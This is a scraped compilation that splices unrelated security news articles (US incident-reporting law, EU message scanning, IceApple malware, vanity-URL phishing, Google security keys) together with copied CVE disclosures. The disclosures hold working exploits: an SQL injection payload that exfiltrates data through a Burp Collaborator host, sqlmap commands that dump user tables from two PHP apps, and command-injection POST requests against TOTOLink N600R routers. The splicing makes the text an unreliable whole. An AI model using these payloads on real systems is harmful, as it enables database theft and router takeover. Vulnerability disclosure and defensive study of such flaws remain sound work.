New federal cybersecurity rules will set timelines for critical infrastructure sector organizations — those in chemical, manufacturing, healthcare, defense contracting, energy, financial, nuclear, or transportation — to report ransomware payments and cyberattacks to CISA. All parties have to comply for it to work and help protect assets.

The Cyber Incident Reporting Act, which was signed into law on March 15, is federal legislation aimed at bolstering the ability to prevent and more rapidly respond to cybersecurity attacks. While it won’t take effect until final rules are determined, it’s one of three parts of the Strengthening American Cybersecurity Act that is aimed at bolstering the cybersecurity of critical infrastructure and the federal government. The need for such an act has become intensified by the situation in Eastern Europe, as cyber warfare has proven to be a key and effective attack tactic for Russian nation-states.

Under the Cyber Incident Reporting Act specifically, critical infrastructure operators and federal agencies are required to report cyberattacks to the Cybersecurity and Infrastructure Security Agency (CISA) within 72 hours, and ransomware payments within 24 hours.

The overarching Strengthening American Cybersecurity Act will update current federal government cybersecurity laws to improve coordination between federal agencies, ensure the government takes a risk-based approach to cybersecurity, and require all civilian agencies to report all cyberattacks to CISA.

Overall, the act demonstrates increased recognition of the need for better policy in place to prevent attacks on a larger scale, and highlights the impact the US government can have on cybersecurity efforts within organizations.

But to truly understand the magnitude of the act's potential impact, we must first gain insight into the current threat environment, while acknowledging the legislation's benefits and limitations. Let's explore.

**Cyber Threats Show No Signs of Slowing Down  
**The recent cyber threats against Ukraine have signaled the need for heightened protection measures, while also demonstrating the large-scale consequences of a cybersecurity attack on an entire country. For example, several Ukrainian government and bank websites were recently offline as a result of a massive distributed denial-of-service (DDoS) attack.

Shortly following these attacks, a new "wiper" malware targeting Ukrainian organizations was discovered on hundreds of machines. These security incidents are suspected to be carried out by Russian cybercriminals, creating a new digital warfare environment that has taken organizations by storm.

One cause for concern for countries that have imposed sanctions against Russia is the potential of cyberattack retaliation. In addition to the escalating geopolitical tension in Eastern Europe, security teams continue to face an overwhelming amount of ransomware attempts, with malicious actors – not just from Russia, but across the world. In fact, approximately 37% of global organizations said they were the victim of a ransomware attack in 2021 — and that figure is only expected to increase this year.

Through the Strengthening American Cybersecurity Act, a new foundation is created for both public and private sector organizations, enabling them to create larger-scale defenses against nation-state actors while better bolstering protection against the continuous cyber threats they grapple with each day.

**Need for Information Sharing and Ransomware Reporting  
**Upon reviewing the comprehensive piece of legislation, one aspect that stood out to me was a call for "the rapid centralized aggregation and dissemination of real-time attack data." Through the passing of the act, the government and security community at large publicly recognize that speed, collection, and sharing of real-time attack data is critical to properly protect private and public networks, especially as ransomware groups and attack methods mature and become more frequent. What is more important than ensuring the right people get the right information at the right time, especially when this type of information sharing is possibly the key to preventing the next cyberattack?

Another noteworthy aspect of the legislation is the process of ransomware attack reporting. Today, there are more than 250 ransomware families, and that figure only continues to grow. This, coupled with the rise in more sophisticated and targeted ransomware, exposes organizations to increased risk.

As such, it's essential to have the proper reporting tools and systems in place. The Cyber Incident Reporting Act, which is an act within the larger legislation, will ensure that all critical infrastructure attacks are reported in a timely manner. Traditionally, these types of events go unreported or underreported; through these new reporting protocols, security teams can better gauge the size and scope of the attacks potentially facing their own organization, and society at large.

**Too Good to Be True? Recognizing Potential Pitfalls  
**While the act brings immense benefits, it's also important to acknowledge several potential limitations exist within the legislation. For instance, while increased transparency is crucial to help prevent damaging attacks, many security teams may be hesitant to report attacks so openly. Increased attack reporting could potentially cause companies to face litigation, which could trigger significant reputational and financial losses as attacks are made public.

To eliminate some of this worry, organizations may consider an increased investment in cyber insurance. While once a fairly new concept, the cyber insurance market is growing exponentially, forecast to become a $20 billion industry by 2025. In the boardroom, CFOs should prioritize conversations on cyber insurance during planning and budgetary meetings. After all, if an organization isn't proactive and instead takes a laggard approach to cybersecurity, they are leaving their companies at risk of attack and lost corporate funds.

Additionally, the act will only be effective if all applicable parties work to ensure that the quality and timeliness of information collected, and the corresponding reporting processes, are taken seriously and done properly. This is not a one-time process; data sharing and incident reporting must be done continuously. The success of the new legislation is dependent on the cooperation of security teams within the public and private sectors it reaches. Simply put, a lax approach will equate to an ineffective bill.

The Strengthening American Cybersecurity Act's passing is a true acknowledgment from the public sector that the frequency and severity of cyberattacks cannot go unresolved. The onus is on both public and private organizations to uphold its principles as these incidents take place – regardless of the size or scale of the attack. Overall, the public sector should continue prioritizing security-related legislation, and the private sector must follow the guidelines provided to them. A concentrated effort from both parties is the best way to protect the nation's most sensitive assets.

Breaking Down the Strengthening American Cybersecurity Act

Europe’s proposed child protection laws could undermine end-to-end encryption for billions of people.

All of your WhatsApp photos, iMessage texts, and Snapchat videos could be scanned to check for child sexual abuse images and videos under newly proposed European rules. The plans, experts warn, may undermine the end-to-end encryption that protects billions of messages sent every day and hamper people’s online privacy.

The European Commission today revealed long-awaited proposals aimed at tackling the huge volumes of child sexual abuse material, also known as CSAM, uploaded to the web each year. The proposed law creates a new EU Centre to deal with child abuse content and introduces obligations for tech companies to “detect, report, block and remove” CSAM from their platforms. The law, announced by Europe’s commissioner for home affairs, Ylva Johansson, says tech companies have failed to voluntarily remove abuse content, and it has been welcomed by child protection and safety groups.

Under the plans, tech companies—ranging from web hosting services to messaging platforms—can be ordered to “detect” both new and previously discovered CSAM, as well as potential instances of “grooming.” The detection could take place in chat messages, files uploaded to online services, or on websites that host abusive material. The plans echo an effort by Apple last year to scan photos on people’s iPhones for abusive content before it was uploaded to iCloud. Apple paused its efforts after a widespread backlash.

If passed, the European legislation would require tech companies to conduct risk assessments for their services to assess the levels of CSAM on their platforms and their existing prevention measures. If necessary, regulators or courts may then issue “detection orders” that say tech companies must start “installing and operating technologies” to detect CSAM. These detection orders would be issued for specific periods of time. The draft legislation doesn’t specify what technologies must be installed or how they will operate—these will be vetted by the new EU Centre—but says they should be used even when end-to-end encryption is in place.

The European proposal to scan people’s messages has been met with frustration from civil rights groups and security experts, who say it’s likely to undermine the end-to-end encryption that’s become the default on messaging apps such as iMessage, WhatsApp, and Signal. “Incredibly disappointing to see a proposed EU regulation on the internet fail to protect end-to-end encryption,” WhatsApp head Will Cathcart tweeted. “This proposal would force companies to scan every person's messages and put EU citizens' privacy and security at serious risk.” Any system that weakens end-to-end encryption could be abused or expanded to look for other types of content, researchers say.

“You either have E2EE or you don’t,” says Alan Woodward, a cybersecurity professor from the University of Surrey. End-to-end encryption protects people’s privacy and security by ensuring that only the sender and receiver of messages can see their content. For example, Meta, the owner of WhatsApp, doesn’t have any way to read your messages or mine their contents for data. The EU’s draft regulation says solutions shouldn’t weaken encryption and says it includes safeguards to ensure this doesn’t happen; however, it doesn’t give specifics for how this would work.

“That being so, there is only one logical solution: client-side scanning where the content is examined when it is decrypted on the user's device for them to view/read,” Woodward says. Last year, Apple announced it would introduce client-side scanning—scanning done on people’s iPhones rather than Apple’s servers—to check photos for known CSAM being uploaded to iCloud. The move sparked protests from civil rights groups and even Edward Snowden about the potential for surveillance, leading Apple to pause its plans a month after initially announcing them. (Apple declined to comment for this story.)

For tech companies, detecting CSAM on their platforms and scanning some communications is not new. Companies operating in the United States are required to report any CSAM they find or that is reported to them by users to the National Center for Missing and Exploited Children (NCMEC), a US-based nonprofit. More than 29 million reports, containing 39 million images and 44 million videos, were made to NCMEC last year alone. Under the new EU rules, the EU Centre will receive CSAM reports from tech companies.

“A lot of companies are not doing the detection today,” Johansson said in a press conference introducing the legislation. “This is not a proposal on encryption, this is a proposal on child sexual abuse material,” Johansson said, adding that the law is “not about reading communication” but detecting illegal abuse content.

At the moment, tech companies find CSAM online in different ways. And the amount of CSAM found is increasing as tech companies get better at detecting and reporting abuse—although some are much better than others. In some cases, AI is being used to hunt down previously unseen CSAM. Duplicates of existing abuse photos and videos can be detected using “hashing systems,” where abuse content is assigned a fingerprint that can be spotted when it’s uploaded to the web again. More than 200 companies, from Google to Apple, use Microsoft's PhotoDNA hashing system to scan millions of files shared online. However, to do this, systems need to have access to the messages and files people are sending, which is not possible when end-to-end encryption is in place.

“In addition to detecting CSAM, obligations will exist to detect the solicitation of children (‘grooming’), which can only mean that conversations will need to be read 24/7,” says Diego Naranjo, head of policy at the civil liberties group European Digital Rights. “This is a disaster for confidentiality of communications. Companies will be asked (via detection orders) or incentivized (via risk mitigation measures) to offer less secure services for everyone if they want to comply with these obligations.”

Discussions about protecting children online and how this can be done with end-to-end encryption are hugely complex, technical, and combined with the horrors of the crimes against vulnerable young people. Research from Unicef, the UN’s children’s fund, published in 2020 says encryption is needed to protect people’s privacy—including children—but adds that it “impedes” efforts to remove content and identify the people sharing it. For years, law enforcement agencies around the world have pushed to create ways to bypass or weaken encryption. “I’m not saying privacy at any cost, and I think we can all agree child abuse is abhorrent,” Woodward says, “but there needs to be a proper, public, dispassionate debate about whether the risks of what might emerge are worth the true effectiveness in fighting child abuse.”

Increasingly, researchers and tech companies have been focusing on safety tools that can exist alongside end-to-encryption. Proposals include using metadata from encrypted messages—the who, how, what, and why of messages, not their content—to analyze people’s behavior and potentially spot criminality. One recent report by the nonprofit Business for Social Responsibility, which was commissioned by Meta, found that end-to-end encryption is an overwhelmingly positive force for upholding people's human rights. It suggested 45 recommendations for how encryption and safety can go together and not involve access to people’s communications. When the report was published in April, Lindsey Andersen, BSR's associate director for human rights, told WIRED: “Contrary to popular belief, there actually is a lot that can be done even without access to messages.”

The EU Wants Big Tech to Scan Your Private Chats for Child Abuse

IceApple's 18 separate modules include those for data exfiltration, credential harvesting, and file and directory deletion, CrowdStrike warns.

A likely China-based, state-sponsored threat actor has been deploying a sophisticated post-exploitation malware framework on Microsoft Exchange servers at organizations in the technology, academic, and government sectors across multiple regions since at least last fall.

The goal of the campaign appears to be intelligence gathering and is tied to a targeted state-sponsored campaign, according to researchers at CrowdStrike. The security vendor is tracking the framework as "IceApple" and described it in a report this week as made up of 18 separate modules with a range of functions that include credential harvesting, file and directory deletion, and data exfiltration.

CrowdStrike's analysis shows the modules are designed to run only in-memory to reduce the malware's footprint on an infected system — a tactic that adversaries often employ in long-running campaigns. The framework also has several other detection-evasion techniques that suggest the adversary has deep knowledge of Internet Information Services (IIS) Web applications. For instance, CrowdStrike observed one of the modules leveraging undocumented fields in IIS software that are not intended to be used by third-party developers.

Over the course of their investigation of the threat, CrowdStrike researchers saw evidence of the adversaries repeatedly returning to compromised systems and using IceApple to execute post-exploitation activities.

Param Singh, vice president of CrowdStrike's Falcon OverWatch threat-hunting services, says IceApple is different from other post-exploitation toolkits in that it is under constant ongoing development even as it is being actively deployed and used. "While IceApple has been observed being deployed on Microsoft Exchange Server instances, it is actually capable of running under any IIS Web application," Singh says.

**Microsoft .NET Link  
**CrowdStrike discovered IceApple while developing detections for malicious activity involving so-called reflective .NET assembly loads. MITRE defines reflective code loading as a technique that threat actors use to conceal malicious payloads. It involves allocating and executing payloads directly in the memory of a running process. Reflectively loaded payloads can include complied binaries, anonymous files, or just bits of fileless executables, according to MITRE. Reflective code loading is like process injection except that code is loaded into a process's own memory rather than that of another process, MITRE has noted.

**".**NET assemblies form the cornerstone of Microsoft’s .NET framework," Singh says. "An assembly can function as either a stand-alone application in the form of an EXE file or as a library for use in other applications as a DLL."

CrowdStrike discovered IceApple in late 2021 when a detection mechanism it was developing for reflective .NET assembly loads triggered on an Exchange Server at a customer location. The company's investigation of the alert showed anomalies in several .NET assembly files, which in turn led to the discovery of the IceApple framework on the system.

**Active Cyberattack Campaign  
**IceApple's modular design gave the adversary a way to build each piece of functionality into its own .NET assembly and then reflectively load each function only as needed. "If not caught, this technique can leave security defenders completely blind to such attacks," Singh says. "For example, defenders will see a legitimate application like a Web server connecting out to a suspicious IP; however, they have no means of knowing what code is triggering that connection."

Singh says CrowdStrike found IceApple to be using a couple of unique tactics to evade detection. One of them is to use undocumented fields in IIS. The other is to blend into the environment by using assembly file names that appear to be normal IIS temporary files. "At closer inspection, the file names are not randomly generated, as would be expected, and the way the assemblies are loaded falls outside of what is normal for Microsoft Exchange and IIS," Singh says.

The IceApple framework is designed to exfiltrate data in several ways. For instance, one of the modules, known as the File Exfiltrator module, allows for a single file to be pilfered from the target host. Another module, called the multifile exfiltrator, allows for multiple files to be encrypted, compressed, and exfiltrated, according to Singh.

"This campaign is currently active and effective," he warns. "But it is unknown at the moment how many organizations may have been impacted by this campaign beyond where CrowdStrike has visibility and those that might have been indirectly impacted via supply chain or other methods."

Cyber-Espionage Attack Drops Post-Exploit Malware Framework on Microsoft Exchange Servers

Complete Online Job Search System v1.0 was discovered to contain a SQL injection vulnerability via /eris/index.php?q=result&searchfor=advancesearch.

\--- tags: CVE --- # Complete Online Job Search System Sql Injection \* \`Description\` => sql injection at \`Advance Search\` \* \`Injection Point\` \`\`\`python= SEARCH=972676&COMPANY='%2b(select%20load\_file('%5c%5c%5c%5cjvinr1qkhm4gaenevj08hk95uw0poge457tzgq4f.burpcollaborator.net%5c%5crij'))%2b'&CATEGORY=&submit=Submit \`\`\` # Exploit \* Use \`Burp Suite\` capture request then save as \`job.txt\` \`\`\`python= POST /eris/index.php?q=result&searchfor=advancesearch HTTP/1.1 Host: 192.168.1.101 Origin: http://192.168.1.101 Cookie: PHPSESSID=1dhucklh9bmi4ks7v86dch2k2f Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Upgrade-Insecure-Requests: 1 Referer: http://192.168.1.101/eris/index.php?q=advancesearch Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate Accept-Language: en-US,en-GB;q=0.9,en;q=0.8 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Connection: close Cache-Control: max-age=0 Content-Length: 46 SEARCH=972676&COMPANY='%2b(select%20load\_file('%5c%5c%5c%5cjvinr1qkhm4gaenevj08hk95uw0poge457tzgq4f.burpcollaborator.net%5c%5crij'))%2b'&CATEGORY=&submit=Submit \`\`\` \* Use \`Sqlmap\` exploit databases \`\`\`python= python3 sqlmap.py -r job.txt -current-db \`\`\` !\[\](https://i.imgur.com/iKybK4N.png) \`\`\`python= python3 sqlmap.py -r job.txt -D erisdb --tables \`\`\` !\[\](https://i.imgur.com/cmyrHUr.png) \`\`\`python= python3 sqlmap.py -r job.txt -columns -D erisdb -T tblusers -dump \`\`\` !\[\](https://i.imgur.com/GgrDCOM.png) # Vulnerable Code !\[\](https://i.imgur.com/8C9pNAQ.png) No filter input when inserting data to database https://www.campcodes.com/projects/php/online-job-search-system-using-php-mysql-free-download/

CVE-2022-29316: Complete Online Job Search System Sql Injection - HackMD

Simple Bus Ticket Booking System v1.0 was discovered to contain multiple SQL injection vulnerbilities via the username and password parameters at /assets/partials/_handleLogin.php.

\--- tags: CVE --- # Simple Bus Ticket Booking System SQL Injection \* \`Description\` => sql injection at login to admin \* \`Injection Point\` \`\`\`python= username=\*&password=000000&submit= \`\`\` # Exploit \* Use \`Burp Suite\` capture request then save as \`bus.txt\` \`\`\`python= POST /SimpleBusTicket-PHP/assets/partials/\_handleLogin.php HTTP/1.1 Host: 192.168.1.101 Content-Length: 34 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 Origin: http://192.168.1.101 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.74 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Referer: http://192.168.1.101/SimpleBusTicket-PHP/ Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Cookie: PHPSESSID=3aqqbkop81gpl260kvpq42stgo Connection: close username=\*&password=000000&submit= \`\`\` \* Use \`Sqlmap\` exploit databases \`\`\`python= python3 sqlmap.py -r bus.txt --current-db \`\`\` !\[\](https://i.imgur.com/D7u0l5b.png) \`\`\`python= python3 sqlmap.py -r bus.txt -D sbtbsphp --tables \`\`\` !\[\](https://i.imgur.com/jel63Am.png) \`\`\`python= python3 sqlmap.py -r bus.txt -columns -D sbtbsphp -T users -dump \`\`\` !\[\](https://i.imgur.com/8V68ANF.png) # Vulnerable Code !\[\](https://i.imgur.com/cIRhPMW.png) \* No filter \`user\_id\` when inserting data to database https://codeastro.com/simple-bus-ticket-booking-system-in-php-with-source-code/

CVE-2022-29317: Simple Bus Ticket Booking System SQL Injection - HackMD

Attackers could abuse the vanity subdomains of popular cloud services such as Box.com, Google, and Zoom to mask attacks in phishing campaigns.

Vanity links created by companies to add their brand to well-known cloud services could become a useful vector for phishing attacks and a way to better fool victims, researchers warn.

Cloud services that don't check whether subdomains have been modified could allow links that appear to be from "varonis.box.com" or "apple.zoom.us" — two examples used in an advisory from data-protection firm Varonis on Wednesday. In the case of Box.com, that could lead to a malicious document; in the case of Zoom, that could mean a webinar that collects information and is unrelated to the cited brand. The problems occurs when a cloud service allows a vanity subdomain, but does not validate the subdomain or use the subdomain to provide services.

Varonis notified Box.com and Zoom of the issue — along with Google, whose links to Google Docs could be spoofed — more than six months ago, and the problems are mostly fixed, the company stated. However, the problem likely exists for other services, says Or Emanuel, director of research and security for Varonis.

"We think it is more than just those three SaaS services," he says, adding that attackers can also use the predictability of the subdomains to select potential victims. "Because of the vanity URLs, it makes it very easy for threat actors to scan all the subdomains of all the big Fortune companies with different cloud providers," he says.

Hiding malicious code and phishing sites behind what appears to be well-known brands is a key way for attackers to fool victims into trusting fraudulent e-mail messages and links to websites. In 2019, for example, three-quarters of companies discovered that lookalike domains had been established by a third party using a non-.COM top-level domain. Because of the expansion of top-level domains, phishers and fraudsters have a broader selection of potential domains, while companies have to consider purchasing a broad swath of domains to adequately protect their intellectual property and brand.

Varonis's research examines the problem from the other direction. Rather than looking at the top-level domains, the company's researchers investigated ways of abusing the subdomains that many cloud service providers allow their customers to use.

"Not only do vanity URLs feel more professional, but they also provide a sense of security for end-users," Varonis stated in the advisory. "Most people are likelier to trust a link at varonis.box.com than a generic app.box.com link. However, if someone can spoof that subdomain, then trusting the vanity URL can backfire."

**Social Engineering With Zoom**  
A software-as-a-service (SaaS) application is vulnerable to the attack when a customer is allowed to use their brand as the subdomain, such as varonis.zoom.us, but at the point where the link is sent to a third party — such as participants in a conference call or webinar — the subdomain is no longer checked. In the case of Zoom's service, attackers could create a webinar that asks registrants a variety of questions useful for social engineering, rebrand the webinar as a popular company, and then change the resulting URL to the targeted company's brand. The original domain — attacker.zoom.us, for example — could be changed to varonis.zoom.us without any impact on the functionality of the link.

A properly branded page could fool a victim into giving information, especially when the subdomain indicates the host is a well-known company. In the case of Box.com, a link such as _app.box.com/f/abcd1234_ could be changed to _varonis.app.box.com/f/abcd1234_ to appear to be an official form collecting information, but actually send the information to the attacker.

"The more interesting attacks from a data protection standpoint are when you have forms for registration or file-sharing requests," Emanuel says. "When the threat actor controls these pages, they can ask for any information they want, and it seems totally legit. It's really hard to determine that it's not a page that the company owns."

Such social engineering becomes useful in phishing attacks, as well as for convincing people to click on links or download untrusted files. In 2021, losses from cybercrime including phishing attacks reached nearly $7 billion, according to the FBI's annual Internet Crime Complaint Center (IC3) report. Phishing accounted for about 38% of the more than 847,000 crimes reported to the IC3.

Cloud providers should ensure that any customization of the URL is validated by the encoding in the link, Emanuel says. Box.com and Google have both fixed the issues, although the bugs still exist for Google Forms and Google Docs, when using the "Publish to the web" feature, according to Varonis. Zoom will warn users when the subdomain has been changed. “We have addressed this issue by warning users if they are being redirected to a different subdomain," a company spokesperson said.

In addition, users should always be skeptical of links, especially if the linked page requests too much information or leads to other links or files.

"We recommend educating your coworkers about the risk associated with clicking on such links and especially submitting PII and other sensitive information via forms, even if they appear to be hosted by your company’s sanctioned SaaS accounts," Varonis stated in the advisory.

Vanity URLs Could Be Spoofed for Social Engineering Attacks

In an effort to combat phishing, Google will allow Android phones and iPhones to be used as security keys.

Security is a continuous game of cat and mouse, with defenders improving their defenses against new attack methods and techniques. At Google I/O this week, the company announced anti-phishing efforts that will make it possible to use Android and iOS devices in the same way as physical security keys.

Security keys such as Google’s Titan Security Key work well to block phishing attempts and are easy to use. Users are prompted to plug the security key into the USB port (although some are NFC-capable) and tap it to authorize a login attempt. Google is bundling this capability into mobile devices, where Android and iOS devices use Bluetooth to verify they are in physical proximity to the device the user is trying to log into.

“Like physical security keys, this helps prevent a distant attacker from tricking you into approving a sign-in on _their_ browser, giving us an added layer of security against the kind of ‘person in the middle’ attacks that can still work against SMS or Google Prompt,” wrote Google engineer Daniel Margolis in a blog post.

Google is also expanding the types of Google Prompt challenges that users may experience if their login attempts look potentially fraudulent. “If we think an account is at a higher risk, or if we see abnormal behavior, we're more likely to use these additional security measures,” Margolis said. 

A new Google Prompt challenge will require users to connect their mobile devices to the same Wi-Fi network as the device they are attempting to log into. Similar to the security key functionality, this allows the user to prove that both mobile and computing devices are in the same location.

Google made several other security announcements at Google I/O, including plans to continue auto-enrolling Google account users into two-step verification, scaling phishing protections for Google Docs, Sheets, and Slides, as well as new security and privacy features in Android. These announcements are in addition to the recent pledge with the FIDO Alliance, Apple, and Microsoft to expand support for the FIDO Sign-in standards for passwordless authentication.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Google Will Use Mobile Devices to Thwart Phishing Attacks

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the filename parameter in /setting/setUploadSetting.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the content obtained through the filename function to V6, then formats the matched content into V33 through the sprintf function, and then brings V33 into getcmdstr

At this time, the corresponding parameter A1 is finally brought into the Popen function, and there is a command injection vulnerability.

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 102
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/telnet.asp?timestamp=1647874864
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647874864:2
    Connection: close
    
    {"topicurl":"setting/setUploadSetting",
    "FileName":"test1$(ls>/tmp/10.txt;)",
    "ContentLength":"1"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

CVE-2022-28913: IOT_vuln/TOTOLink/N600R/10 at main · EPhaha/IOT_vuln

TOTOLink N600R V5.3c.7159_B20190425 was discovered to contain a command injection vulnerability via the filename parameter in /setting/setUpgradeFW.

**TOTOlink N600R V5.3c.7159\_B20190425 Command injection vulnerability****Overview**

*   Manufacturer's website information：http://www.totolink.cn
*   Firmware download address ： http://www.totolink.cn/home/menu/detail.html?menu\_listtpl=download&id=2&ids=36

**1\. Affected version**

Figure 1 shows the latest firmware Ba of the router

**Vulnerability details**

The program passes the contents obtained by the filename parameter to V8

Then, format the matching content of V8 through the sprintf function into V31, and bring V31 into the cstesystem function

At this time, corresponding to the parameter A1, the function assigns A1 to the array of V9, and finally executes the command through the execv function. There is a command injection vulnerability

**Recurring vulnerabilities and POC**

In order to reproduce the vulnerability, the following steps can be followed:

1.  Use the fat simulation firmware V5.3c.7159\_B20190425
2.  Attack with the following POC attacks

    POST /cgi-bin/cstecgi.cgi HTTP/1.1
    Host: 192.168.0.1
    Content-Length: 111
    Accept: */*
    X-Requested-With: XMLHttpRequest
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.66 Safari/537.36
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Origin: http://192.168.0.1
    Referer: http://192.168.0.1/adm/upload_firmware.asp?timestamp=1647873626298
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: SESSION_ID=2:1647873424:2
    Connection: close
    
    {"topicurl":"setting/setUpgradeFW",
    "FileName":"test1$(ls>/tmp/8.txt;)",
    "ContentLength":"1",
    "Flags":"1"
    }
    

The reproduction results are as follows:

Figure 2 POC attack effect

Finally, you can write exp, which can achieve a very stable effect of obtaining the root shell

Tag

#apple